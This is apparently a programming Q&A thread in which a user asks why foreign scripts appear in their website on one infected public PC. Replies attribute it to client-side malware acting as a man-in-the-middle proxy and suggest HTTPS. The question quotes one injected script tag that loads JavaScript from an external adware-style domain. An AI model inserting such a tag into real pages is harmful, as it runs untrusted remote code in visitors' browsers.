# How are random scripts being injected into my web application?

Tags: javascript, php, dom, malware

I'm on a public PC that seems to be infected with some malware that is distorting my site.  Other PCs work fine so I believe it is this particular PC and not my godaddy server.  One of the random scripts are below.

```
<script src="http://i.pricejs.info/pfna/javascript.js?channel=pfnana2014&amp;hid=v5532D312D352D32312D313433383236313438312D16B3533E63&amp;instgrp=20151129__1263__lnk_auto_1218_1&amp;trinity=Z12u7t2g6b0u&amp;sset=7" type="text/javascript"></script>
```

How is this happening and is there anything I can do to prevent this?

Perhaps I can block DOM injection some how?  Is the browser infected some how?

PHP/mySQL on the server.

Comment: what browser did you use?

Comment: You cant control the users computer. If they are infected with malware there is nothing you can do about it. You could attempt at writing some javascript that checks your DOM every once in awhile for injections. But to be honest that is the clients problem not yours. You would never be able to code something that would catch everything

Answer (score 1):

> How is this happening

It is possible that the malware inside that PC is running a proxy server that tunnels your network communications through it and injecting markup to your pages. If I remember correctly, this is a form of a man-in-the-middle (MITM) attack.

> is there anything I can do to prevent this?

No. It's the client machine's problem. You could serve your site in HTTPS. Any breakage in the communication (like a proxy in between) will break end-to-end security and cause the browser to show a warning of an unsecure site.

> Perhaps I can block DOM injection some how?

You probably can't. There's not much you can do inside a sandboxed environment like like a webpage vs a privileged environment the malware is running on.

> Is the browser infected some how?

Potentially not just the browser, but the machine itself.